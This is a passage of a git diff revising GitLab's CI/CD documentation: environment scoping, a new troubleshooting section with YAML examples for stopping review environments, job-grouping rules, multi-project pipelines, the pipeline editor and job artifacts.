environment](../variables/README.md#limit-the-environment-scopes-of-cicd-variables). +[create a project CI/CD variable to be injected only into a production environment](../variables/README.md#limit-the-environment-scope-of-a-cicd-variable). In most cases, these features use the _environment specs_ mechanism, which offers -an efficient way to implement scoping within each environment group. +an efficient way to implement scoping in each environment group. -Let's say there are four environments: +For example, if there are four environments: - `production` - `staging` @@ -722,11 +712,11 @@ Each environment can be matched with the following environment spec: | review/* | | | Matched | Matched | | review/feature-1 | | | Matched | | -As you can see, you can use specific matching for selecting a particular environment, -and also use wildcard matching (`*`) for selecting a particular environment group, -such as [Review Apps](../review_apps/index.md) (`review/*`). +You can use specific matching to select a particular environment. +You can also use wildcard matching (`*`) to select a particular environment group, +like [Review Apps](../review_apps/index.md) (`review/*`). -Note that the most _specific_ spec takes precedence over the other wildcard matching. In this case, +The most specific spec takes precedence over the other wildcard matching. In this case, the `review/feature-1` spec takes precedence over `review/*` and `*` specs. ## Related topics @@ -739,14 +729,68 @@ the `review/feature-1` spec takes precedence over `review/*` and `*` specs. environment's operational health. **(PREMIUM)** - [Deployment safety](deployment_safety.md#restrict-write-access-to-a-critical-environment): Secure your deployments. -<!-- ## Troubleshooting - -Include any troubleshooting steps that you can foresee. If you know beforehand what issues -one might have when setting this up, or when something is changed, or on upgrading, it's -important to describe those, too. Think of things that may go wrong and include them here. -This is important to minimize requests for support, and to avoid doc comments with -questions that you know someone might ask. - -Each scenario can be a third-level heading, e.g. `### Getting error message X`. -If you have none to add when creating a doc, leave this section in place -but commented out to help encourage others to add to it in the future. --> +## Troubleshooting + +### The job with `action: stop` doesn't run + +In some cases, environments do not [stop when a branch is deleted](#stop-an-environment-when-a-branch-is-deleted). + +For example, the environment might start in a stage that also has a job that failed. +Then the jobs in later stages job don't start. If the job with the `action: stop` +for the environment is also in a later stage, it can't start and the environment isn't deleted. + +To ensure the `action: stop` can always run when needed, you can: + +- Put both jobs in the same stage: + + ```yaml + stages: + - build + - test + - deploy + + ... + + deploy_review: + stage: deploy + environment: + name: review/$CI_COMMIT_REF_NAME + url: https://$CI_ENVIRONMENT_SLUG.example.com + on_stop: stop_review + + stop_review: + stage: deploy + environment: + name: review/$CI_COMMIT_REF_NAME + action: stop + when: manual + ``` + +- Add a [`needs`](../yaml/README.md#needs) entry to the `action: stop` job so the + job can start out of stage order: + + ```yaml + stages: + - build + - test + - deploy + - cleanup + + ... + + deploy_review: + stage: deploy + environment: + name: review/$CI_COMMIT_REF_NAME + url: https://$CI_ENVIRONMENT_SLUG.example.com + on_stop: stop_review + + stop_review: + stage: cleanup + needs: + - deploy_review + environment: + name: review/$CI_COMMIT_REF_NAME + action: stop + when: manual + ``` diff --git a/doc/ci/environments/protected_environments.md b/doc/ci/environments/protected_environments.md index 9a639fde5f6..df0bb2817ab 100644 --- a/doc/ci/environments/protected_environments.md +++ b/doc/ci/environments/protected_environments.md @@ -66,8 +66,8 @@ Alternatively, you can use the API to protect an environment: when: manual script: - 'echo "Deploying to ${CI_ENVIRONMENT_NAME}"' - environment: - name: ${CI_JOB_NAME} + environment: + name: ${CI_JOB_NAME} ``` 1. Use the UI to [create a new group](../../user/group/index.md#create-a-group). diff --git a/doc/ci/examples/README.md b/doc/ci/examples/README.md index fc6807fd191..3238b062752 100644 --- a/doc/ci/examples/README.md +++ b/doc/ci/examples/README.md @@ -166,7 +166,7 @@ For examples of others who have implemented GitLab CI/CD, see: To see how you can integrate GitLab CI/CD with third-party systems, see: -- [Streamline and shorten error remediation with Sentry’s new GitLab integration](https://about.gitlab.com/blog/2019/01/25/sentry-integration-blog-post/) +- [Streamline and shorten error remediation with Sentry's new GitLab integration](https://about.gitlab.com/blog/2019/01/25/sentry-integration-blog-post/) - [How to simplify your smart home configuration with GitLab CI/CD](https://about.gitlab.com/blog/2018/08/02/using-the-gitlab-ci-slash-cd-for-smart-home-configuration-management/) - [Demo: GitLab + Jira + Jenkins](https://about.gitlab.com/blog/2018/07/30/gitlab-workflow-with-jira-jenkins/) - [Introducing Auto Breakfast from GitLab (sort of)](https://about.gitlab.com/blog/2018/06/29/introducing-auto-breakfast-from-gitlab/) diff --git a/doc/ci/examples/end_to_end_testing_webdriverio/index.md b/doc/ci/examples/end_to_end_testing_webdriverio/index.md index 07bad3afc65..54e12cafa55 100644 --- a/doc/ci/examples/end_to_end_testing_webdriverio/index.md +++ b/doc/ci/examples/end_to_end_testing_webdriverio/index.md @@ -83,7 +83,7 @@ multiple tests, such as making sure you are logged in. The function `it` defines an individual test. [The `browser` object](http://v4.webdriver.io/guide/testrunner/browserobject.html) is WebdriverIO's -special sauce. It provides most of [the WebdriverIO API methods](http://v4.webdriver.io/docs/api/) that are the key to +special sauce. It provides most of [the WebdriverIO API methods](http://v4.webdriver.io/api.html) that are the key to steering the browser. In this case, we can use [`browser.url`](http://v4.webdriver.io/api/protocol/url.html) to visit `/page-that-does-not-exist` to hit our 404 page. We can then use [`browser.getUrl`](http://v4.webdriver.io/api/property/getUrl.html) diff --git a/doc/ci/examples/laravel_with_gitlab_and_envoy/index.md b/doc/ci/examples/laravel_with_gitlab_and_envoy/index.md index 2acd7315630..5a5e44c03bf 100644 --- a/doc/ci/examples/laravel_with_gitlab_and_envoy/index.md +++ b/doc/ci/examples/laravel_with_gitlab_and_envoy/index.md @@ -532,7 +532,7 @@ That's a lot to take in, isn't it? Let's run through it step by step. [Runners](../../runners/README.md) run the script defined by `.gitlab-ci.yml`. The `image` keyword tells the runners which image to use. -The `services` keyword defines additional images [that are linked to the main image](../../docker/using_docker_images.md#what-is-a-service). +The `services` keyword defines additional images [that are linked to the main image](../../services/index.md). Here we use the container image we created before as our main image and also use MySQL 5.7 as a service. ```yaml @@ -555,7 +555,7 @@ So we should adjust the configuration of MySQL instance by defining `MYSQL_DATAB Find out more about MySQL variables at the [official MySQL Docker Image](https://hub.docker.com/_/mysql). Also set the variables `DB_HOST` to `mysql` and `DB_USERNAME` to `root`, which are Laravel specific variables. -We define `DB_HOST` as `mysql` instead of `127.0.0.1`, as we use MySQL Docker image as a service which [is linked to the main Docker image](../../docker/using_docker_images.md#how-services-are-linked-to-the-job). +We define `DB_HOST` as `mysql` instead of `127.0.0.1`, as we use MySQL Docker image as a service which [is linked to the main Docker image](../../services/index.md#how-services-are-linked-to-the-job). ```yaml variables: diff --git a/doc/ci/jobs/img/collapsible_log_v12_6.png b/doc/ci/jobs/img/collapsible_log_v12_6.png Binary files differdeleted file mode 100644 index a1e9aeb244a..00000000000 --- a/doc/ci/jobs/img/collapsible_log_v12_6.png +++ /dev/null diff --git a/doc/ci/jobs/img/collapsible_log_v13_10.png b/doc/ci/jobs/img/collapsible_log_v13_10.png Binary files differnew file mode 100644 index 00000000000..23f06e97477 --- /dev/null +++ b/doc/ci/jobs/img/collapsible_log_v13_10.png diff --git a/doc/ci/jobs/img/manual_job_variables.png b/doc/ci/jobs/img/manual_job_variables.png Binary files differdeleted file mode 100644 index 63801ade21f..00000000000 --- a/doc/ci/jobs/img/manual_job_variables.png +++ /dev/null diff --git a/doc/ci/jobs/img/manual_job_variables_v13_10.png b/doc/ci/jobs/img/manual_job_variables_v13_10.png Binary files differnew file mode 100644 index 00000000000..af8223e0c30 --- /dev/null +++ b/doc/ci/jobs/img/manual_job_variables_v13_10.png diff --git a/doc/ci/jobs/index.md b/doc/ci/jobs/index.md index 0c5fa59da8e..1a31db09c92 100644 --- a/doc/ci/jobs/index.md +++ b/doc/ci/jobs/index.md @@ -137,24 +137,14 @@ The jobs are ordered by comparing the numbers from left to right. You usually want the first number to be the index and the second number to be the total. [This regular expression](https://gitlab.com/gitlab-org/gitlab/blob/2f3dc314f42dbd79813e6251792853bc231e69dd/app/models/commit_status.rb#L99) -evaluates the job names: `\d+[\s:\/\\]+\d+\s*`. +evaluates the job names: `([\b\s:]+((\[.*\])|(\d+[\s:\/\\]+\d+)))+\s*\z`. +One or more `: [...]`, `X Y`, `X/Y`, or `X\Y` sequences are removed from the **end** +of job names only. Matching substrings found at the beginning or in the middle of +job names are not removed. -### Improved job grouping - -> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/52644) in GitLab 13.9. -> - It's [deployed behind a feature flag](../../user/feature_flags.md), disabled by default. -> - It's enabled on GitLab.com. -> - To use it in GitLab self-managed instances, ask a GitLab administrator to [enable it](../../administration/feature_flags.md). **(FREE SELF)** - -Job grouping is evaluated with an improved regular expression to group jobs by name: - -- `([\b\s:]+((\[.*\])|(\d+[\s:\/\\]+\d+)))+\s*\z`. - -The new implementation removes one or more `: [...]`, `X Y`, `X/Y`, or `X\Y` sequences -from the **end** of job names only. - -Matching substrings occurring at the beginning or in the middle of build names are -no longer removed. +In [GitLab 13.8 and earlier](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/52644), +the regular expression is `\d+[\s:\/\\]+\d+\s*`. [Feature flag](../../user/feature_flags.md) +removed in [GitLab 13.11](https://gitlab.com/gitlab-org/gitlab/-/issues/322080). ## Specifying variables when running manual jobs @@ -172,7 +162,7 @@ Add a variable name (key) and value here to override the value defined in [the UI or `.gitlab-ci.yml`](../variables/README.md#custom-cicd-variables), for a single run of the manual job. - + ## Delay a job @@ -200,10 +190,10 @@ the duration. In the following example: -- Two sections are collapsed and can be expanded. +- Three sections are collapsed and can be expanded. - Three sections are expanded and can be collapsed. - + ### Custom collapsible sections @@ -227,6 +217,9 @@ job1: - echo -e "\e[0Ksection_end:`date +%s`:my_first_section\r\e[0K" ``` +Depending on the shell that your runner uses, for example if it is using ZSH, you may need to +escape the special characters like so: `\\e` and `\\r`. + In the example above: - `date +%s`: The Unix timestamp (for example `1560896352`). diff --git a/doc/ci/merge_request_pipelines/index.md b/doc/ci/merge_request_pipelines/index.md index 7e76efe8b50..024155bdde7 100644 --- a/doc/ci/merge_request_pipelines/index.md +++ b/doc/ci/merge_request_pipelines/index.md @@ -197,7 +197,7 @@ could mistakenly trust the merge request because it passed a faked pipeline. Parent project members with at least [Developer permissions](../../user/permissions.md) can create pipelines in the parent project for merge requests from a forked project. In the merge request, go to the **Pipelines** and click -**Run Pipeline** button. +**Run pipeline** button. WARNING: Fork merge requests could contain malicious code that tries to steal secrets in the diff --git a/doc/ci/merge_request_pipelines/pipelines_for_merged_results/merge_trains/index.md b/doc/ci/merge_request_pipelines/pipelines_for_merged_results/merge_trains/index.md index edfedbc2527..b8ddc547156 100644 --- a/doc/ci/merge_request_pipelines/pipelines_for_merged_results/merge_trains/index.md +++ b/doc/ci/merge_request_pipelines/pipelines_for_merged_results/merge_trains/index.md @@ -73,7 +73,7 @@ To enable merge trains: - You must have maintainer [permissions](../../../../user/permissions.md). - You must be using [GitLab Runner](https://gitlab.com/gitlab-org/gitlab-runner) 11.9 or later. -- In GitLab 12.0 and later, you need [Redis](https://redis.io/) 3.2 or later. +- In GitLab 13.0 and later, you need [Redis](https://redis.io/) 5.0 or later. - Your repository must be a GitLab repository, not an [external repository](../../../ci_cd_for_external_repos/index.md). diff --git a/doc/ci/metrics_reports.md b/doc/ci/metrics_reports.md index ed14e61c54b..47236668e89 100644 --- a/doc/ci/metrics_reports.md +++ b/doc/ci/metrics_reports.md @@ -37,7 +37,7 @@ For an MR, the values of these metrics from the feature branch are compared to t ## How to set it up -Add a job that creates a [metrics report](pipelines/job_artifacts.md#artifactsreportsmetrics) (default filename: `metrics.txt`). The file should conform to the [OpenMetrics](https://openmetrics.io/) format. +Add a job that creates a [metrics report](yaml/README.md#artifactsreportsmetrics) (default filename: `metrics.txt`). The file should conform to the [OpenMetrics](https://openmetrics.io/) format. For example: diff --git a/doc/ci/migration/circleci.md b/doc/ci/migration/circleci.md index 0a44232efd3..b6c7bc6653f 100644 --- a/doc/ci/migration/circleci.md +++ b/doc/ci/migration/circleci.md @@ -265,7 +265,7 @@ test_async: ## Contexts and variables -CircleCI provides [Contexts](https://circleci.com/docs/2.0/contexts/) to securely pass environment variables across project pipelines. In GitLab, a [Group](../../user/group/index.md) can be created to assemble related projects together. At the group level, [CI/CD variables](../variables/README.md#group-level-cicd-variables) can be stored outside the individual projects, and securely passed into pipelines across multiple projects. +CircleCI provides [Contexts](https://circleci.com/docs/2.0/contexts/) to securely pass environment variables across project pipelines. In GitLab, a [Group](../../user/group/index.md) can be created to assemble related projects together. At the group level, [CI/CD variables](../variables/README.md#group-cicd-variables) can be stored outside the individual projects, and securely passed into pipelines across multiple projects. ## Orbs diff --git a/doc/ci/migration/jenkins.md b/doc/ci/migration/jenkins.md index 1424868401e..c7dd4a46137 100644 --- a/doc/ci/migration/jenkins.md +++ b/doc/ci/migration/jenkins.md @@ -305,7 +305,7 @@ my_job: In GitLab, we use the [`variables` keyword](../yaml/README.md#variables) to define different variables at runtime. These can also be set up through the GitLab UI, under CI/CD settings. See also our [general documentation on variables](../variables/README.md), -including the section on [protected variables](../variables/README.md#protect-a-custom-variable) which can be used +including the section on [protected variables](../variables/README.md#protect-a-cicd-variable) which can be used to limit access to certain variables to certain environments or runners: ```yaml diff --git a/doc/ci/multi_project_pipelines.md b/doc/ci/multi_project_pipelines.md index 9736f8c1418..28505fb7519 100644 --- a/doc/ci/multi_project_pipelines.md +++ b/doc/ci/multi_project_pipelines.md @@ -1,14 +1,13 @@ --- stage: Verify -group: Continuous Integration +group: Pipeline Authoring info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments type: reference --- -# Multi-project pipelines +# Multi-project pipelines **(FREE)** -> - [Introduced](https://about.gitlab.com/releases/2015/08/22/gitlab-7-14-released/#build-triggers-api-gitlab-ci) in GitLab 7.14, as Build Triggers. -> - [Made available](https://gitlab.com/gitlab-org/gitlab/-/issues/199224) in all tiers in GitLab 12.8. +> [Moved](https://gitlab.com/gitlab-org/gitlab/-/issues/199224) to GitLab Free in 12.8. You can set up [GitLab CI/CD](README.md) across multiple projects, so that a pipeline in one project can trigger a pipeline in another project. @@ -42,8 +41,6 @@ With Multi-Project Pipelines you can visualize the entire pipeline, including al ## Multi-project pipeline visualization **(PREMIUM)** -> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/2121) in [GitLab Premium 9.3](https://about.gitlab.com/releases/2017/06/22/gitlab-9-3-released/#multi-project-pipeline-graphs). - When you configure GitLab CI/CD for your project, you can visualize the stages of your [jobs](pipelines/index.md#configure-a-pipeline) on a [pipeline graph](pipelines/index.md#visualize-pipelines). @@ -56,8 +53,7 @@ and when hovering or tapping (on touchscreen devices) they expand and are shown ## Triggering multi-project pipelines through API -> - Use of `CI_JOB_TOKEN` for multi-project pipelines was [introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/2017) in [GitLab Premium](https://about.gitlab.com/pricing/) 9.3. -> - Use of `CI_JOB_TOKEN` for multi-project pipelines was [made available](https://gitlab.com/gitlab-org/gitlab/-/issues/31573) in all tiers in GitLab 12.4. +> [Moved](https://gitlab.com/gitlab-org/gitlab/-/issues/31573) to GitLab Free in 12.4. When you use the [`CI_JOB_TOKEN` to trigger pipelines](triggers/README.md#ci-job-token), GitLab recognizes the source of the job token, and thus internally ties these pipelines @@ -76,8 +72,7 @@ When using: ## Creating multi-project pipelines from `.gitlab-ci.yml` -> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/8997) in [GitLab Premium](https://about.gitlab.com/pricing/) 11.8. -> - [Made available](https://gitlab.com/gitlab-org/gitlab/-/issues/199224) in all tiers in 12.8. +> [Moved](https://gitlab.com/gitlab-org/gitlab/-/issues/199224) to GitLab Free in 12.8. ### Triggering a downstream pipeline using a bridge job @@ -220,7 +215,7 @@ the ones defined in the upstream project take precedence. #### With variable inheritance -You can pass variables to a downstream pipeline with [`dotenv` variable inheritance](variables/README.md#inherit-cicd-variables) and [cross project artifact downloads](yaml/README.md#cross-project-artifact-downloads-with-needs). +You can pass variables to a downstream pipeline with [`dotenv` variable inheritance](variables/README.md#pass-an-environment-variable-to-another-job) and [cross project artifact downloads](yaml/README.md#cross-project-artifact-downloads-with-needs). In the upstream pipeline: @@ -260,7 +255,7 @@ test: ### Mirroring status from triggered pipeline -> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/11238) in [GitLab Premium](https://about.gitlab.com/pricing/) 12.3. +> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/11238) in GitLab Premium 12.3. > - [Moved](https://gitlab.com/gitlab-org/gitlab/-/issues/199224) to GitLab Free in 12.8. You can mirror the pipeline status from the triggered pipeline to the source @@ -309,7 +304,7 @@ Some features are not implemented yet. For example, support for environments. ## Trigger a pipeline when an upstream project is rebuilt **(PREMIUM)** -> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/9045) in [GitLab Premium](https://about.gitlab.com/pricing/) 12.8. +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/9045) in GitLab Premium 12.8. You can trigger a pipeline in your project whenever a pipeline finishes for a new tag in a different project: @@ -324,8 +319,9 @@ now trigger a pipeline on the current project's default branch. The maximum number of upstream pipeline subscriptions is 2 by default, for both the upstream and downstream projects. This [application limit](../administration/instance_limits.md#number-of-cicd-subscriptions-to-a-project) can be changed on self-managed instances by a GitLab administrator. -The upstream project needs to be [public](../public_access/public_access.md) for -pipeline subscription to work. +The upstream project needs to be [public](../public_access/public_access.md) +and the user must have [developer permissions](../user/permissions.md#project-members-permissions) +for the upstream project. ## Downstream private projects confidentiality concern diff --git a/doc/ci/pipeline_editor/index.md b/doc/ci/pipeline_editor/index.md index aabdc6cd36b..57aea5d493b 100644 --- a/doc/ci/pipeline_editor/index.md +++ b/doc/ci/pipeline_editor/index.md @@ -10,11 +10,8 @@ type: reference > - [Introduced](https://gitlab.com/groups/gitlab-org/-/epics/4540) in GitLab 13.8. > - [Feature flag removed](https://gitlab.com/gitlab-org/gitlab/-/issues/270059) in GitLab 13.10. -WARNING: -This feature might not be available to you. Check the **version history** note above for details. - The pipeline editor is the primary place to edit the GitLab CI/CD configuration in -your `.gitlab-ci.yml` file. To access it, go to **CI/CD > Editor**. +the `.gitlab-ci.yml` file in the root of your repository. To access the editor, go to **CI/CD > Editor**. From the pipeline editor page you can: @@ -25,8 +22,7 @@ From the pipeline editor page you can: - View an [expanded](#view-expanded-configuration) version of your configuration. - [Commit](#commit-changes-to-ci-configuration) the changes to a specific branch. -NOTE: -You must already have [a `.gitlab-ci.yml` file](../quick_start/index.md#create-a-gitlab-ciyml-file) +In GitLab 13.9 and earlier, you must already have [a `.gitlab-ci.yml` file](../quick_start/index.md#create-a-gitlab-ciyml-file) on the default branch of your project to use the editor. ## Validate CI configuration diff --git a/doc/ci/pipelines/img/job_artifacts_browser.png b/doc/ci/pipelines/img/job_artifacts_browser.png Binary files differdeleted file mode 100644 index d3d8de5ac60..00000000000 --- a/doc/ci/pipelines/img/job_artifacts_browser.png +++ /dev/null diff --git a/doc/ci/pipelines/img/job_artifacts_browser_button.png b/doc/ci/pipelines/img/job_artifacts_browser_button.png Binary files differdeleted file mode 100644 index 21072ce1248..00000000000 --- a/doc/ci/pipelines/img/job_artifacts_browser_button.png +++ /dev/null diff --git a/doc/ci/pipelines/img/job_artifacts_browser_button_v13_11.png b/doc/ci/pipelines/img/job_artifacts_browser_button_v13_11.png Binary files differnew file mode 100644 index 00000000000..710a82075ce --- /dev/null +++ b/doc/ci/pipelines/img/job_artifacts_browser_button_v13_11.png diff --git a/doc/ci/pipelines/img/job_artifacts_browser_v13_11.png b/doc/ci/pipelines/img/job_artifacts_browser_v13_11.png Binary files differnew file mode 100644 index 00000000000..6a8ea49b833 --- /dev/null +++ b/doc/ci/pipelines/img/job_artifacts_browser_v13_11.png diff --git a/doc/ci/pipelines/img/job_artifacts_builds_page.png b/doc/ci/pipelines/img/job_artifacts_builds_page.png Binary files differdeleted file mode 100644 index 13e039ba934..00000000000 --- a/doc/ci/pipelines/img/job_artifacts_builds_page.png +++ /dev/null diff --git a/doc/ci/pipelines/img/job_artifacts_jobs_page_v13_11.png b/doc/ci/pipelines/img/job_artifacts_jobs_page_v13_11.png Binary files differnew file mode 100644 index 00000000000..9f09e36b927 --- /dev/null +++ b/doc/ci/pipelines/img/job_artifacts_jobs_page_v13_11.png diff --git a/doc/ci/pipelines/img/job_artifacts_merge_request.png b/doc/ci/pipelines/img/job_artifacts_merge_request.png Binary files differdeleted file mode 100644 index e87839ceeca..00000000000 --- a/doc/ci/pipelines/img/job_artifacts_merge_request.png +++ /dev/null diff --git a/doc/ci/pipelines/img/job_artifacts_merge_request_v13_11.png b/doc/ci/pipelines/img/job_artifacts_merge_request_v13_11.png Binary files differnew file mode 100644 index 00000000000..f4b875de471 --- /dev/null +++ b/doc/ci/pipelines/img/job_artifacts_merge_request_v13_11.png diff --git a/doc/ci/pipelines/img/job_artifacts_pipelines_page.png b/doc/ci/pipelines/img/job_artifacts_pipelines_page.png Binary files differdeleted file mode 100644 index 983f903ca72..00000000000 --- a/doc/ci/pipelines/img/job_artifacts_pipelines_page.png +++ /dev/null diff --git a/doc/ci/pipelines/img/job_artifacts_pipelines_page_v13_11.png b/doc/ci/pipelines/img/job_artifacts_pipelines_page_v13_11.png Binary files differnew file mode 100644 index 00000000000..c7b0b91d488 --- /dev/null +++ b/doc/ci/pipelines/img/job_artifacts_pipelines_page_v13_11.png diff --git a/doc/ci/pipelines/img/pipelines_v13_11.png b/doc/ci/pipelines/img/pipelines_v13_11.png Binary files differnew file mode 100644 index 00000000000..8981f4ce860 --- /dev/null +++ b/doc/ci/pipelines/img/pipelines_v13_11.png diff --git a/doc/ci/pipelines/index.md b/doc/ci/pipelines/index.md index c2fcbbcf72f..6d013a43583 100644 --- a/doc/ci/pipelines/index.md +++ b/doc/ci/pipelines/index.md @@ -133,8 +133,8 @@ operation of the pipeline. To execute a pipeline manually: 1. Navigate to your project's **CI/CD > Pipelines**. -1. Select the **Run Pipeline** button. -1. On the **Run Pipeline** page: +1. Select the **Run pipeline** button. +1. On the **Run pipeline** page: 1. Select the branch or tag to run the pipeline for in the **Run for branch name or tag** field. 1. Enter any [environment variables](../variables/README.md) required for the pipeline run. You can set specific variables to have their [values prefilled in the form](#prefill-variables-in-manual-pipelines). @@ -332,10 +332,12 @@ GitLab capitalizes the stages' names in the pipeline graphs. ### Regular pipeline graphs +> - [Visualization improved](https://gitlab.com/gitlab-org/gitlab/-/issues/276949) in GitLab 13.11. + Regular pipeline graphs show the names of the jobs in each stage. Regular pipeline graphs can be found when you are on a [single pipeline page](#view-pipelines). For example: - + [Multi-project pipeline graphs](../multi_project_pipelines.md#multi-project-pipeline-visualization) help you visualize the entire pipeline, including all cross-project inter-dependencies. **(PREMIUM)** diff --git a/doc/ci/pipelines/job_artifacts.md b/doc/ci/pipelines/job_artifacts.md index cf8e4e71534..fa97f9bd75d 100644 --- a/doc/ci/pipelines/job_artifacts.md +++ b/doc/ci/pipelines/job_artifacts.md @@ -8,25 +8,21 @@ type: reference, howto # Job artifacts -> - Introduced in GitLab 8.2 and GitLab Runner 0.7.0. -> - Starting with GitLab 8.4 and GitLab Runner 1.0, the artifacts archive format changed to `ZIP`, and it's now possible to browse its contents, with the added ability of downloading the files separately. -> - In GitLab 8.17, builds were renamed to jobs. -> - The artifacts browser is available only for new artifacts that are sent to GitLab using GitLab Runner version 1.0 and up. You cannot browse old artifacts already uploaded to GitLab. +> Introduced in [GitLab 12.4](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/16675), artifacts in internal and private projects can be previewed when [GitLab Pages access control](../../administration/pages/index.md#access-control) is enabled. -Job artifacts are a list of files and directories created by a job -once it finishes. This feature is [enabled by default](../../administration/job_artifacts.md) in all -GitLab installations. +Jobs can output an archive of files and directories. This output is known as a job artifact. -Job artifacts created by GitLab Runner are uploaded to GitLab and are downloadable as a single archive using the GitLab UI or the [GitLab API](../../api/job_artifacts.md#get-job-artifacts). +You can download job artifacts by using the GitLab UI or the [API](../../api/job_artifacts.md#get-job-artifacts). <i class="fa fa-youtube-play youtube" aria-hidden="true"></i> -For an overview, watch the video [GitLab CI Pipeline, Artifacts, and Environments](https://www.youtube.com/watch?v=PCKDICEe10s). -Watch also [GitLab CI pipeline tutorial for beginners](https://www.youtube.com/watch?v=Jav4vbUrqII). +For an overview of job artifacts, watch the video [GitLab CI pipelines, artifacts, and environments](https://www.youtube.com/watch?v=PCKDICEe10s). +Or, for an introduction, watch [GitLab CI pipeline tutorial for beginners](https://www.youtube.com/watch?v=Jav4vbUrqII). -## Defining artifacts in `.gitlab-ci.yml` +For administrator information about job artifact storage, see [administering job artifacts](../../administration/job_artifacts.md). -A simple example of using the artifacts definition in `.gitlab-ci.yml` would be -the following: +## Create job artifacts + +To create job artifacts, use the `artifacts` keyword in your `.gitlab-ci.yml` file: ```yaml pdf: @@ -37,376 +33,120 @@ pdf: expire_in: 1 week ``` -A job named `pdf` calls the `xelatex` command to build a PDF file from the -latex source file `mycv.tex`. We then define the `artifacts` paths which in -turn are defined with the `paths` keyword. All paths to files and directories -are relative to the repository that was cloned during the build. - -By default, the artifacts upload when the job succeeds. You can also set artifacts to upload -when the job fails, or always, by using [`artifacts:when`](../yaml/README.md#artifactswhen) -keyword. GitLab keeps these uploaded artifacts for 1 week, as defined -by the `expire_in` definition. You can keep the artifacts from expiring -via the [web interface](#browsing-artifacts). If the expiry time is not defined, it defaults -to the [instance wide setting](../../user/admin_area/settings/continuous_integration.md#default-artifacts-expiration). - -For more examples on artifacts, follow the [artifacts reference in -`.gitlab-ci.yml`](../yaml/README.md#artifacts). - -### `artifacts:reports` - -> - [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/merge_requests/20390) in GitLab 11.2. -> - Requires GitLab Runner 11.2 and above. - -The `artifacts:reports` keyword is used for collecting test reports, code quality -reports, and security reports from jobs. It also exposes these reports in the GitLab -UI (merge requests, pipeline views, and security dashboards). - -The test reports are collected regardless of the job results (success or failure). -You can use [`artifacts:expire_in`](../yaml/README.md#artifactsexpire_in) to set up an expiration -date for their artifacts. - -If you also want the ability to browse the report output files, include the -[`artifacts:paths`](../yaml/README.md#artifactspaths) keyword. - -#### `artifacts:reports:junit` - -> - [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/merge_requests/20390) in GitLab 11.2. -> - Requires GitLab Runner 11.2 and above. - -The `junit` report collects [JUnit report format XML files](https://www.ibm.com/support/knowledgecenter/en/SSQ2R2_14.1.0/com.ibm.rsar.analysis.codereview.cobol.doc/topics/cac_useresults_junit.html) -as artifacts. Although JUnit was originally developed in Java, there are many -third party ports for other -languages like JavaScript, Python, Ruby, and so on. - -See [Unit test reports](../unit_test_reports.md) for more details and examples. -Below is an example of collecting a JUnit report format XML file from Ruby's RSpec test tool: - -```yaml -rspec: - stage: test - script: - - bundle install - - rspec --format RspecJunitFormatter --out rspec.xml - artifacts: - reports: - junit: rspec.xml -``` - -The collected Unit test reports upload to GitLab as an artifact and display in merge requests. - -If the JUnit tool you use exports to multiple XML files, specify -multiple test report paths within a single job to -concatenate them into a single file. Use a filename pattern (`junit: rspec-*.xml`), -an array of filenames (`junit: [rspec-1.xml, rspec-2.xml, rspec-3.xml]`), or a -combination thereof (`junit: [rspec.xml, test-results/TEST-*.xml]`). - -#### `artifacts:reports:dotenv` - -> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/17066) in GitLab 12.9. -> - Requires GitLab Runner 11.5 and later. - -The `dotenv` report collects a set of environment variables as artifacts. - -The collected variables are registered as runtime-created variables of the job, -which is useful to [set dynamic environment URLs after a job finishes](../environments/index.md#set-dynamic-environment-urls-after-a-job-finishes). - -There are a couple of exceptions to the [original dotenv rules](https://github.com/motdotla/dotenv#rules): - -- The variable key can contain only letters, digits, and underscores (`_`). -- The maximum size of the `.env` file is 5 KB. -- In GitLab 13.5 and older, the maximum number of inherited variables is 10. -- In [GitLab 13.6 and later](https://gitlab.com/gitlab-org/gitlab/-/issues/247913), - the maximum number of inherited variables is 20. -- Variable substitution in the `.env` file is not supported. -- The `.env` file can't have empty lines or comments (starting with `#`). -- Key values in the `env` file cannot have spaces or newline characters (`\n`), including when using single or double quotes. -- Quote escaping during parsing (`key = 'value'` -> `{key: "value"}`) is not supported. - -#### `artifacts:reports:cobertura` - -> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/3708) in GitLab 12.9. -> - Requires [GitLab Runner](https://docs.gitlab.com/runner/) 11.5 and above. - -The `cobertura` report collects [Cobertura coverage XML files](../../user/project/merge_requests/test_coverage_visualization.md). -The collected Cobertura coverage reports upload to GitLab as an artifact -and display in merge requests. - -Cobertura was originally developed for Java, but there are many -third party ports for other languages like JavaScript, Python, Ruby, and so on. - -#### `artifacts:reports:terraform` - -> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/207528) in GitLab 13.0. -> - Requires [GitLab Runner](https://docs.gitlab.com/runner/) 11.5 and above. +In this example, a job named `pdf` calls the `xelatex` command to build a PDF file from the +LaTeX source file, `mycv.tex`. -The `terraform` report obtains a Terraform `tfplan.json` file. [JQ processing required to remove credentials](../../user/infrastructure/mr_integration.md#setup). The collected Terraform -plan report uploads to GitLab as an artifact and displays -in merge requests. For more information, see -[Output `terraform plan` information into a merge request](../../user/infrastructure/mr_integration.md). +The `paths` keyword determines which files to add to the job artifacts. +All paths to files and directories are relative to the repository where the job was created. -#### `artifacts:reports:codequality` +The `expire_in` keyword determines how long GitLab keeps the job artifacts. +You can also [use the UI to keep job artifacts from expiring](#download-job-artifacts). +If `expire_in` is not defined, the +[instance-wide setting](../../user/admin_area/settings/continuous_integration.md#default-artifacts-expiration) +is used. -> - Introduced in [GitLab Starter](https://about.gitlab.com/pricing/) 11.5. -> - Made [available in all tiers](https://gitlab.com/gitlab-org/gitlab/-/issues/212499) in GitLab 13.2. -> - Requires GitLab Runner 